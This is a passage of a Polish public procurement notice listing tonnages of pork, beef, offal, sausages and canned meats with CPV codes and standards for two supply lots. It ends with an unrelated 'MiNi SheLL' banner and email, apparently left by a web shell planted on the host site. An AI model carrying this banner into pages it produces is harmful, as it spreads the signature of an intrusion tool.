mięso wieprzowe klopsowe (stosunek mięsa do tłuszczu 80/20) - produkt mięsny, średnio rozdrobniony, nie poddany obróbce termicznej, bez dodatku przypraw 2.300 kg, CPV 15113000-3, PN-A-82011
mięso wieprzowe łopatka bez kości - mięso wieprzowe, elementy świeże, 4.000 kg, CPV 15113300-6, PN-86/A-82002
mięso wieprzowe gulaszowe (stosunek mięsa do tłuszczu 50/50) - produkt mięsny, średnio rozdrobniony, nie poddany obróbce termicznej, 4.500 kg, CPV 15113300-6, PN-A-82011
mięso wieprzowe schab bez kości - mięso wieprzowe, elementy świeże, 950 kg, CPV 15113100-4, PN-86/A-82002
boczek wędzony bez kości płaty -  mięso wieprzowe, elementy świeże, wędzone, 1.400 kg, CPV 15131200-7, PN-A-82007
wędzonka bigosowa bez kości - mięso wieprzowe, elementy świeże, wędzone, 2.500 kg, CPV 15131200-7, PN-A-82007
słonina płaty - świeża, 1.200 kg, CPV 15113000-3, PN-86/A-82002
mięso wołowe bez kości ekstra - mięso wołowe, elementy świeże, 600 kg, CPV 15111190-2, PN-88/A-82003
mięso wołowe antrykot - mięso wołowe, elementy świeże, 500 kg, CPV 15111140-2, PN-88/A-82003
mięso wołowe z kością - żebra - mięso wołowe, elementy świeże, 900 kg, CPV 15111100-0, PN-88/A-82003
żołądki wieprzowe - podroby świeże, 2.900 kg, CPV 15114000-0, PN-86/A-82004
żołądki wołowe - podroby świeże, 100 kg, CPV 15114000-0, PN-86/A-82004
ozory wieprzowe - podroby świeże, 1.850 kg, CPV 15114000-0, PN-86/A-82004
serca wieprzowe - podroby świeże, 2.300 kg, CPV 15114000-0, PN-86/A-82004
wątroba wieprzowa - podroby świeże, 3.000 kg, CPV 15114000-0, PN-86/A-82004
kiełbasa zwyczajna - wędlina średnio rozdrobniona, 4.600 kg, CPV 15131130-5, PN-A-82007
kiełbasa parówkowa - wędlina parzona, homogenizowana, drobno rozdrobniona, 3.400 kg,CPV 15131130-5, PN-A-82007
kiełbasa biała parzona - wędlina parzona, średnio rozdrobniona, 3.000 kg, CPV 15131130-5, PN-A-82007
kiełbasa mortadela - wędlina homogenizowana, drobno rozdrobniona, 3.000 kg, CPV 15131130-3, PN-A-82007
kiełbasa golonkowa parzona - wędlina parzona, grubo rozdrobniona, 500 kg, CPV 15131133-6, PN-A-82007
kiełbasa mielonka - wędlina parzona, średnio rozdrobniona, 2.500 kg, CPV 15131133-6, PN-A-82007
kiełbasa słoikowa - wędlina parzona, średnio rozdrobniona, 1.400 kg, CPV 15131133-6, PN-A-82007
kiełbasa szynkowa mielona wieprzowa - wędlina drobno rozdrobniona, 1.500 kg, CPV 15131133-6, PN-A-82007
serdelki śląskie - wędlina drobno rozdrobniona, 1.000 kg, CPV 15131133-6, PN-A-82007
pieczeń wielkopolska - wyrób blokowy średnio rozdrobniony, 2.600 kg, CPV 15131133-6, PN-A-82007
wątrobianka - wędlina podrobowa, 3.000 kg, CPV 15131130-2, PN-A-82007
metka cebulowa - wędlina drobno rozdrobniona, 2.500 kg, CPV 15131133-6, PN-A-82007
salceson czarny - wędlina podrobowa, 1.400 kg, CPV 15131134-3, PN-A-82007
kaszanka  -  wędlina podrobowa, parzona, 3.500 kg, CPV 15131134-3, PN-A-82007.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.14.10-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4: Dostawy konserw mięsnych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> konserwa pasztet z indyka - puszka samootwieralna do 300 g, 800 kg, CPV 15131310-1, PN-A-82022
konserwa pasztet drobiowy - puszka samootwieralna do 300 g, 400 kg, CPV 15131310-1, PN-A-82022
konserwa pasztet z gęsi - puszka samootwieralna do 300 g, 1.400 kg, CPV 15131310-1, PN-A-82022
konserwa wołowa - puszka samootwieralna do 400 g, 1.000 kg, CPV 15131000-5, PN-A-82022
konserwa wieprzowa - puszka samootwieralna do 400 g, 1.100 kg, CPV 15131000-5, PN-A-82022.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.10.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com